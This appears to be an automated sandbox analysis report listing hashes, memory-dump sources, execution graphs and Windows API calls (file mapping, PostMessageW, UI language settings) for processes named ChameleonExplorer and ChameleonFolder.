• Instruction ID: 0355798b0d21a49fb4ed39ecd7839df75424e87a042872653b34b1a436bb28d2
• Opcode Fuzzy Hash: 337d149f2599faf40f8f4b5b24f55f0b289ac114d62a12b1cb2572cf3c548eee
• Instruction Fuzzy Hash: DCF05031714F194BC764B76D685DBA637D6FB8D311F0401BAA446CB242DF28DD0683D2

Control-flow Graph

Memory Dump Source
• Source File: 0000000F.00000002.2927494034.0000000000746000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00746000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_746000_ChameleonExplorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc87781c06a949e6809458a0363eb14191e86d4ac667f2f4b8a5f1a2f0eb017e
• Instruction ID: 4ab4d2b3a869eeab1aeb32a94e0eeeeab0180f802aa0ae5602ed6bd09d1d13de
• Opcode Fuzzy Hash: dc87781c06a949e6809458a0363eb14191e86d4ac667f2f4b8a5f1a2f0eb017e
• Instruction Fuzzy Hash: BDD01240619AD80ACA4D637D08697643EE0AB5E109F8805FDA4CDDA243D64E82864393

Control-flow Graph

Memory Dump Source
• Source File: 0000000F.00000002.2927494034.0000000000746000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00746000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_746000_ChameleonExplorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e03f64bbd47964890b2e18fe4a3a28b7ee9f174fbae2c66631e9062f43b4305
• Instruction ID: 881525bc5ec10a888784033b76c6ba394d4a63fe85feea939d294398114af9ab
• Opcode Fuzzy Hash: 8e03f64bbd47964890b2e18fe4a3a28b7ee9f174fbae2c66631e9062f43b4305
• Instruction Fuzzy Hash: 93C02B20320D1C0FCF48FEFD04CA33061C0E31C211F8000F5B80CCB243D15948A08301

Control-flow Graph

Memory Dump Source
• Source File: 0000000F.00000002.2948534595.0000000003269000.00000020.00000001.01000000.00000011.sdmp, Offset: 03269000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3269000_ChameleonExplorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27b82fb93593e14b94ca17fc8e8b4daf4b4b6affc90cb308ffe96dbe6b776e98
• Instruction ID: 5b0c23ad9f1f53ef7944190032017f5bcb29a15861602131c2b23b4630cd8e56
• Opcode Fuzzy Hash: 27b82fb93593e14b94ca17fc8e8b4daf4b4b6affc90cb308ffe96dbe6b776e98
• Instruction Fuzzy Hash: 91D0A73103850945CB19EB30DC455A13264F7002347800355C823C04F0FA7C12D8D641

Control-flow Graph

Memory Dump Source
• Source File: 0000000F.00000002.2948534595.0000000003269000.00000020.00000001.01000000.00000011.sdmp, Offset: 03269000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3269000_ChameleonExplorer.jbxd
Similarity
• API ID:
• String ID: a$a$z$z
• API String ID: 0-3217829273
• Opcode ID: e549a898086fe992de222b4ed16a90abae3ac20dd35349c3e5caa1a660c80229
• Instruction ID: 16257eebbcd2d01d0da1cf4889ee4d8d2dbfde4c80ba7b0f524cf27bf2459233
• Opcode Fuzzy Hash: e549a898086fe992de222b4ed16a90abae3ac20dd35349c3e5caa1a660c80229
• Instruction Fuzzy Hash: 8221F22AB76A2F021B3C986C5CDC27EE185F71570DB3EE27ACA83D6305C4A099CF0185

Execution Graph

Execution Coverage: 1.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 30
Total number of Limit Nodes: 2

Control-flow Graph

APIs
• CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}), ref: 029E9BC1
• MapViewOfFile.KERNELBASE(029F350C,00000006,00000000,00000000,00000028,?), ref: 029E9C04
Strings
• {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 029E9BB2
Memory Dump Source
• Source File: 00000010.00000002.2011930287.0000000002961000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02961000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2961000_ChameleonFolder.jbxd
Similarity
• API ID: File$CreateMappingView
• String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
• API String ID: 3452162329-4124573863
• Opcode ID: d81083a408626354d8b178e76fa58dbeed5c51872e148d88eefeb74327e76cb8
• Instruction ID: 9a8c73d621481da8d0f03613b1d7875a321de463aa5410533563a2cc312c40fa
• Opcode Fuzzy Hash: d81083a408626354d8b178e76fa58dbeed5c51872e148d88eefeb74327e76cb8
• Instruction Fuzzy Hash: B4216F74688340EFEB91EFA8D846B1477E5AB89720F004595E60ADB3D0C774E840CF18

Control-flow Graph

APIs
• PostMessageW.USER32(00D60000,029F940C,?,?), ref: 029E98D7
Memory Dump Source
• Source File: 00000010.00000002.2011930287.0000000002961000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02961000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2961000_ChameleonFolder.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: b091d2b159dfa42d8a177c04cec7d82eb1aca69306704807c0f6d80c56b0ef4f
• Instruction ID: 8e7859601cc9cf42b74843a11cb1ef8c52de9fabcfa61e50f2a4275fd77da926
• Opcode Fuzzy Hash: b091d2b159dfa42d8a177c04cec7d82eb1aca69306704807c0f6d80c56b0ef4f
• Instruction Fuzzy Hash: CD1163B5A44248EFDB80DF9CD880E9A77ECAB4D360B008545FA19DB350C334E9509F64

APIs
• GetThreadUILanguage.KERNEL32(?,00000000), ref: 02959CE9
• SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 02959D47
• SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 02959DA4
• SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 02959DD7
  • Part of subcall function 02959C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,02959D55), ref: 02959CAB
  • Part of subcall function 02959C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,02959D55), ref: 02959CC8
Memory Dump Source
• Source File: 00000010.00000002.2011930287.0000000002951000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02951000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2951000_ChameleonFolder.jbxd
Similarity
• API ID: Thread$LanguagesPreferred$Language
• String ID:
• API String ID: 2255706666-0
• Opcode ID: 52b59fb83b88076b3551e8e58da27165bcc577fb1e244c25cc0011abbf196dcd
                                                                                                            • Instruction ID: 7930c18567f74be4335a90e120402ce5b7e0588c817a911c1466bfc0f8cbd141
                                                                                                            • Opcode Fuzzy Hash: 52b59fb83b88076b3551e8e58da27165bcc577fb1e244c25cc0011abbf196dcd
                                                                                                            • Instruction Fuzzy Hash: 9F315070F0422ADBEB50DFE8D884AEEB3B9FF44315F404565E915E7280E774AA05CB90

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:1.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:30
                                                                                                            Total number of Limit Nodes:2
                                                                                                             execution_graph (nodes as id and address, with API calls where recorded; "->" lists each node's successors)
                                                                                                             • 27379 29daf3c -> 27381
                                                                                                             • 27380 29daf80
                                                                                                             • 27381 29daf44 -> 27380, 27383
                                                                                                             • 27383 29d95fc -> 27384, 27385
                                                                                                             • 27384 29d9621 -> 27380
                                                                                                             • 27385 29d960b -> 27384, 27387
                                                                                                             • 27387 29d95b4 -> 27388, 27389
                                                                                                             • 27388 29d95e0 -> 27384
                                                                                                             • 27389 29d95c4 -> 27391
                                                                                                             • 27391 29da82c -> 27392
                                                                                                             • 27392 29da86d -> 27395
                                                                                                             • 27394 29da8a6 -> 27388
                                                                                                             • 27395 29da708 -> 27396
                                                                                                             • 27396 29da729 -> 27397, 27401
                                                                                                             • 27397 29da7a4 -> 27394
                                                                                                             • 27399 29da7c0 -> 27397, 27400
                                                                                                             • 27400 29d9df4 (6 API calls) -> 27397
                                                                                                             • 27401 29d9df4 -> 27402
                                                                                                             • 27402 29d9e17 -> 27404, 27405
                                                                                                             • 27404 29d9e20 -> 27399
                                                                                                             • 27405 29d9cd8 (6 API calls) -> 27404
                                                                                                             • 27406 2a6988c -> 27407, 27408
                                                                                                             • 27407 2a698b2 -> 27408, 27409
                                                                                                             • 27408 2a6989a
                                                                                                             • 27409 2a698bd PostMessageW -> 27408
                                                                                                             • 27410 2a69b9c -> 27411, 27412
                                                                                                             • 27411 2a69bac -> 27412, 27413
                                                                                                             • 27412 2a69bd8
                                                                                                             • 27413 2a69bb2 CreateFileMappingW -> 27412, 27414
                                                                                                             • 27414 2a69be6 MapViewOfFile -> 27412

                                                                                                             Control-flow Graph

                                                                                                             (basic blocks as id and address range, with the API or call in the block where recorded; "->" lists each block's successors; the rendered graph's executed/not-executed colouring is not preserved in this text view)
                                                                                                             • 30 2a69b9c-2a69ba6 -> 31, 32
                                                                                                             • 31 2a69c3f-2a69c47 -> 35, 36
                                                                                                             • 32 2a69bac -> 33, 34
                                                                                                             • 33 2a69c72-2a69c74
                                                                                                             • 34 2a69bb2-2a69bd6 CreateFileMappingW -> 39, 40
                                                                                                             • 35 2a69c56-2a69c5e -> 37, 38
                                                                                                             • 36 2a69c49-2a69c50 -> 35
                                                                                                             • 37 2a69c60-2a69c67 -> 38
                                                                                                             • 38 2a69c6d call 2a67348 -> 33
                                                                                                             • 39 2a69be6-2a69c15 MapViewOfFile -> 43, 44
                                                                                                             • 40 2a69bd8-2a69be1 -> 33
                                                                                                             • 43 2a69c17-2a69c31 -> 44
                                                                                                             • 44 2a69c38 call 2a67328 -> 47
                                                                                                             • 47 2a69c3d -> 33
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}), ref: 02A69BC1
                                                                                                            • MapViewOfFile.KERNELBASE(02A7350C,00000006,00000000,00000000,00000028,?), ref: 02A69C04
                                                                                                            Strings
                                                                                                            • {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 02A69BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.2007723960.00000000029E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 029E1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_17_2_29e1000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
                                                                                                            • API String ID: 3452162329-4124573863
                                                                                                            • Opcode ID: 99fe8e6301cb2254b5af704402e84289fafe75844e975147a367cc2446785cd4
                                                                                                            • Instruction ID: e8e9d0d7a6698ff21e1f4fe5797949d1d734316d6bf5950f6d7b377992873c85
                                                                                                            • Opcode Fuzzy Hash: 99fe8e6301cb2254b5af704402e84289fafe75844e975147a367cc2446785cd4
                                                                                                            • Instruction Fuzzy Hash: 90213534A84201EFDB11DBA8D889F167BE6AB4A710F118595E6509B390CF70E856EF18

                                                                                                             Control-flow Graph

                                                                                                             (basic blocks as id and address range, with the API in the block where recorded; "->" lists each block's successors; the rendered graph's executed/not-executed colouring is not preserved in this text view)
                                                                                                             • 107 2a6988c-2a69898 -> 108, 109
                                                                                                             • 108 2a698b2-2a698bb -> 110, 111
                                                                                                             • 109 2a6989a-2a698b0 -> 114
                                                                                                             • 110 2a698dc-2a698f8 -> 114
                                                                                                             • 111 2a698bd-2a698d7 PostMessageW -> 110
                                                                                                             • 114 2a698fb-2a69900
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(02920000,02A7940C,?,?), ref: 02A698D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.2007723960.00000000029E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 029E1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_17_2_29e1000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 119a6f8fc235d389dd79eb9d45e23824885d911cfcd1525a66a09d5fc1092050
                                                                                                            • Instruction ID: 3abac7d7a64d9119edd7dca7c90cb9d7530d5646089b2acad902f7d64bddf6ca
                                                                                                            • Opcode Fuzzy Hash: 119a6f8fc235d389dd79eb9d45e23824885d911cfcd1525a66a09d5fc1092050
                                                                                                            • Instruction Fuzzy Hash: 35115EB6A40209EFCB40DF9CD884E9A77E8AB4D350F008545FA18DB350C730EA51AF64
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 029D9CE9
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 029D9D47
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 029D9DA4
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 029D9DD7
                                                                                                              • Part of subcall function 029D9C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,029D9D55), ref: 029D9CAB
                                                                                                              • Part of subcall function 029D9C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,029D9D55), ref: 029D9CC8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.2007723960.00000000029D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 029D1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_17_2_29d1000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: 4d2f014ad7cf0c8997ec82b3094aea3cecb3c24bbd03c416cf85e182accd26a6
                                                                                                            • Instruction ID: d96b3224f98894ada9a3e0723ddc30794effc5b3357251e63a67c2d29baf317c
                                                                                                            • Opcode Fuzzy Hash: 4d2f014ad7cf0c8997ec82b3094aea3cecb3c24bbd03c416cf85e182accd26a6
                                                                                                            • Instruction Fuzzy Hash: 92314F70E0021A9BEB10EFE8C880BAEB3F9FF48315F408575E515E7254EB749A05DB90

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:1.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:30
                                                                                                            Total number of Limit Nodes:2
                                                                                                             execution_graph (nodes as id and address, with API calls where recorded; "->" lists each node's successors)
                                                                                                             • 27195 29aaf3c -> 27197
                                                                                                             • 27196 29aaf80
                                                                                                             • 27197 29aaf44 -> 27196, 27199
                                                                                                             • 27199 29a95fc -> 27200, 27201
                                                                                                             • 27200 29a9621 -> 27196
                                                                                                             • 27201 29a960b -> 27200, 27203
                                                                                                             • 27203 29a95b4 -> 27204, 27205
                                                                                                             • 27204 29a95e0 -> 27200
                                                                                                             • 27205 29a95c4 -> 27207
                                                                                                             • 27207 29aa82c -> 27208
                                                                                                             • 27208 29aa86d -> 27211
                                                                                                             • 27210 29aa8a6 -> 27204
                                                                                                             • 27211 29aa708 -> 27213
                                                                                                             • 27212 29aa7a4 -> 27210
                                                                                                             • 27213 29aa729 -> 27212, 27217
                                                                                                             • 27215 29aa7c0 -> 27212, 27216
                                                                                                             • 27216 29a9df4 (6 API calls) -> 27212
                                                                                                             • 27217 29a9df4 -> 27218
                                                                                                             • 27218 29a9e17 -> 27220, 27221
                                                                                                             • 27220 29a9e20 -> 27215
                                                                                                             • 27221 29a9cd8 (6 API calls) -> 27220
                                                                                                             • 27222 2a3988c -> 27223, 27225
                                                                                                             • 27223 2a398b2 -> 27224, 27225
                                                                                                             • 27224 2a398bd PostMessageW -> 27225
                                                                                                             • 27225 2a3989a
                                                                                                             • 27226 2a39b9c -> 27227, 27231
                                                                                                             • 27227 2a39bac -> 27228, 27231
                                                                                                             • 27228 2a39bb2 CreateFileMappingW -> 27229, 27231
                                                                                                             • 27229 2a39be6 MapViewOfFile -> 27231
                                                                                                             • 27231 2a39bd8

                                                                                                             Control-flow Graph

                                                                                                             (basic blocks as id and address range, with the API or call in the block where recorded; "->" lists each block's successors; the rendered graph's executed/not-executed colouring is not preserved in this text view)
                                                                                                             • 30 2a39b9c-2a39ba6 -> 31, 32
                                                                                                             • 31 2a39c3f-2a39c47 -> 33, 34
                                                                                                             • 32 2a39bac -> 35, 36
                                                                                                             • 33 2a39c56-2a39c5e -> 37, 38
                                                                                                             • 34 2a39c49-2a39c50 -> 33
                                                                                                             • 35 2a39c72-2a39c74
                                                                                                             • 36 2a39bb2-2a39bd6 CreateFileMappingW -> 39, 40
                                                                                                             • 37 2a39c60-2a39c67 -> 38
                                                                                                             • 38 2a39c6d call 2a37348 -> 35
                                                                                                             • 39 2a39be6-2a39c15 MapViewOfFile -> 43, 44
                                                                                                             • 40 2a39bd8-2a39be1 -> 35
                                                                                                             • 43 2a39c17-2a39c31 -> 44
                                                                                                             • 44 2a39c38 call 2a37328 -> 47
                                                                                                             • 47 2a39c3d -> 35
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}), ref: 02A39BC1
                                                                                                            • MapViewOfFile.KERNELBASE(02A4350C,00000006,00000000,00000000,00000028,?), ref: 02A39C04
                                                                                                            Strings
                                                                                                            • {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 02A39BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2074011261.00000000029B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 029B1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_29b1000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
                                                                                                            • API String ID: 3452162329-4124573863
                                                                                                            • Opcode ID: 30c58e8c27157e4325dc79f683963cb9007e61e51b8aa6b64544e8d885b07cb7
                                                                                                            • Instruction ID: 568c125ceafad96336ab79bd36c8c23d3d041e33349f79ec83b10511852fcdab
                                                                                                            • Opcode Fuzzy Hash: 30c58e8c27157e4325dc79f683963cb9007e61e51b8aa6b64544e8d885b07cb7
                                                                                                            • Instruction Fuzzy Hash: 87212778A84302EFDB12EBA8D885B0677F5AB8A710F208595F5149F290CFB1E8518F51

                                                                                                             Control-flow Graph

                                                                                                             (basic blocks as id and address range, with the API in the block where recorded; "->" lists each block's successors; the rendered graph's executed/not-executed colouring is not preserved in this text view)
                                                                                                             • 107 2a3988c-2a39898 -> 108, 109
                                                                                                             • 108 2a398b2-2a398bb -> 110, 111
                                                                                                             • 109 2a3989a-2a398b0 -> 113
                                                                                                             • 110 2a398bd-2a398d7 PostMessageW -> 111
                                                                                                             • 111 2a398dc-2a398f8 -> 113
                                                                                                             • 113 2a398fb-2a39900
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(02720000,02A4940C,?,?), ref: 02A398D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2074011261.00000000029B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 029B1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_29b1000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: d9369144f8689d4fb021da509cc1329bf85f07c470ea243190f68d31ff319eb3
                                                                                                            • Instruction ID: 3deecf6bd036ea54bbfd85969bd36dba6efb8955751c8ad3e5c96eff44207b45
                                                                                                            • Opcode Fuzzy Hash: d9369144f8689d4fb021da509cc1329bf85f07c470ea243190f68d31ff319eb3
                                                                                                            • Instruction Fuzzy Hash: B71160BAA40209EFCB40DF9CD880E9A77F8AB8D350B108545FA19DB350C771EA519FA4
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 029A9CE9
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 029A9D47
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 029A9DA4
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 029A9DD7
                                                                                                              • Part of subcall function 029A9C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,029A9D55), ref: 029A9CAB
                                                                                                              • Part of subcall function 029A9C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,029A9D55), ref: 029A9CC8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2074011261.00000000029A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 029A1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_29a1000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: 817ef2e1cb56d48325d92021e9e90e92c3c550fb85163090115a87eb1097369e
                                                                                                            • Instruction ID: 9d827d9105458471c2584f7e5bd089f80669eb657c44d83701461c2b5154f51a
                                                                                                            • Opcode Fuzzy Hash: 817ef2e1cb56d48325d92021e9e90e92c3c550fb85163090115a87eb1097369e
                                                                                                            • Instruction Fuzzy Hash: 27314B70E0021A9BEB10EFE8C890AAEB3F9FF48314F404565E515E7285EB74AA45CB90

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:1.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:30
                                                                                                            Total number of Limit Nodes:2
                                                                                                             execution_graph (nodes as id and address, with API calls where recorded; "->" lists each node's successors)
                                                                                                             • 27534 2a7af3c -> 27535
                                                                                                             • 27535 2a7af44 -> 27535 (self-loop), 27537, 27538
                                                                                                             • 27537 2a7af80
                                                                                                             • 27538 2a795fc -> 27539, 27540
                                                                                                             • 27539 2a79621 -> 27537
                                                                                                             • 27540 2a7960b -> 27539, 27542
                                                                                                             • 27542 2a795b4 -> 27543, 27544
                                                                                                             • 27543 2a795c4 -> 27546
                                                                                                             • 27544 2a795e0 -> 27539
                                                                                                             • 27546 2a7a82c -> 27547
                                                                                                             • 27547 2a7a86d -> 27550
                                                                                                             • 27549 2a7a8a6 -> 27544
                                                                                                             • 27550 2a7a708 -> 27552
                                                                                                             • 27551 2a7a7a4 -> 27549
                                                                                                             • 27552 2a7a729 -> 27551, 27556
                                                                                                             • 27554 2a7a7c0 -> 27551, 27555
                                                                                                             • 27555 2a79df4 (6 API calls) -> 27551
                                                                                                             • 27556 2a79df4 -> 27557
                                                                                                             • 27557 2a79e17 -> 27559, 27560
                                                                                                             • 27559 2a79e20 -> 27554
                                                                                                             • 27560 2a79cd8 (6 API calls) -> 27559
                                                                                                             • 27561 2b09b9c -> 27562, 27563
                                                                                                             • 27562 2b09bac -> 27563, 27564
                                                                                                             • 27563 2b09bd8
                                                                                                             • 27564 2b09bb2 CreateFileMappingW -> 27563, 27565
                                                                                                             • 27565 2b09be6 MapViewOfFile -> 27563
                                                                                                             • 27567 2b0988c -> 27568, 27569
                                                                                                             • 27568 2b098b2 -> 27569, 27570
                                                                                                             • 27569 2b0989a
                                                                                                             • 27570 2b098bd PostMessageW -> 27569

                                                                                                             Control-flow Graph

                                                                                                             (basic blocks as id and address range, with the API or call in the block where recorded; "->" lists each block's successors; the rendered graph's executed/not-executed colouring is not preserved in this text view)
                                                                                                             • 30 2b09b9c-2b09ba6 -> 31, 32
                                                                                                             • 31 2b09bac -> 35, 36
                                                                                                             • 32 2b09c3f-2b09c47 -> 33, 34
                                                                                                             • 33 2b09c56-2b09c5e -> 37, 38
                                                                                                             • 34 2b09c49-2b09c50 -> 33
                                                                                                             • 35 2b09c72-2b09c74
                                                                                                             • 36 2b09bb2-2b09bd6 CreateFileMappingW -> 39, 40
                                                                                                             • 37 2b09c60-2b09c67 -> 38
                                                                                                             • 38 2b09c6d call 2b07348 -> 35
                                                                                                             • 39 2b09be6-2b09c15 MapViewOfFile -> 43, 44
                                                                                                             • 40 2b09bd8-2b09be1 -> 35
                                                                                                             • 43 2b09c17-2b09c31 -> 44
                                                                                                             • 44 2b09c38 call 2b07328 -> 47
                                                                                                             • 47 2b09c3d -> 35
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}), ref: 02B09BC1
                                                                                                            • MapViewOfFile.KERNELBASE(02B1350C,00000006,00000000,00000000,00000028,?), ref: 02B09C04
                                                                                                            Strings
                                                                                                            • {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 02B09BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2063430433.0000000002A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02A81000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_2a81000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
                                                                                                            • API String ID: 3452162329-4124573863
                                                                                                            • Opcode ID: 6fb19c085978afc528201bf83726e73f8209d08d6f894e3b943fb8f6d230b587
                                                                                                            • Instruction ID: b726ce71258cdb374e048b33ca705f2d3c130d6ac1be3fdbe790fa7db2b1bda9
                                                                                                            • Opcode Fuzzy Hash: 6fb19c085978afc528201bf83726e73f8209d08d6f894e3b943fb8f6d230b587
                                                                                                            • Instruction Fuzzy Hash: 7E214D34AC4600EFD721DBA8D985B05BBE6EB09B60F9085D5E511DB3D1DB70A890CF14

                                                                                                            Control-flow Graph

control_flow_graph (rendered graph omitted; node colouring for executed/not-executed blocks is not recoverable): basic blocks 02B0988C-02B09900. The only API call, PostMessageW, sits in block 02B098BD-02B098D7, reached from 02B098B2-02B098BB and falling through to 02B098DC-02B098F8 before the common exit block 02B098FB-02B09900; the alternative path 02B0989A-02B098B0 goes straight to that exit.
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(00B70000,02B1940C,?,?), ref: 02B098D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2063430433.0000000002A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02A81000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_2a81000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 3fed0571b5503e34907b5ae2571506aece38ce61b871637ec76875678c9cdc09
                                                                                                            • Instruction ID: a2b2de13cd64fe8f59b4a45e20642ebc9dc2800b55baebd64d1834fa704b948b
                                                                                                            • Opcode Fuzzy Hash: 3fed0571b5503e34907b5ae2571506aece38ce61b871637ec76875678c9cdc09
                                                                                                            • Instruction Fuzzy Hash: 99116375A40608EFCB40DF9CD980E9A77E9EB0D7A0B408585F918DB351D730E9509F64
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 02A79CE9
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 02A79D47
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 02A79DA4
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 02A79DD7
                                                                                                              • Part of subcall function 02A79C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,02A79D55), ref: 02A79CAB
                                                                                                              • Part of subcall function 02A79C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,02A79D55), ref: 02A79CC8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2063430433.0000000002A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02A71000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_2a71000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: 18fbbc10937fc36df1a6918d6876764677fbb3f2c27403f941bff0428a83736f
                                                                                                            • Instruction ID: f253d57d62ff436229c32683b43771eb8676b1eb8eccf62a0f965b661ed258b7
                                                                                                            • Opcode Fuzzy Hash: 18fbbc10937fc36df1a6918d6876764677fbb3f2c27403f941bff0428a83736f
                                                                                                            • Instruction Fuzzy Hash: 69315C70E0022A9BDF10EFE8CC80AAFB3B9FF08315F504566D515E7285EB74AA04CB94

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:6.8%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
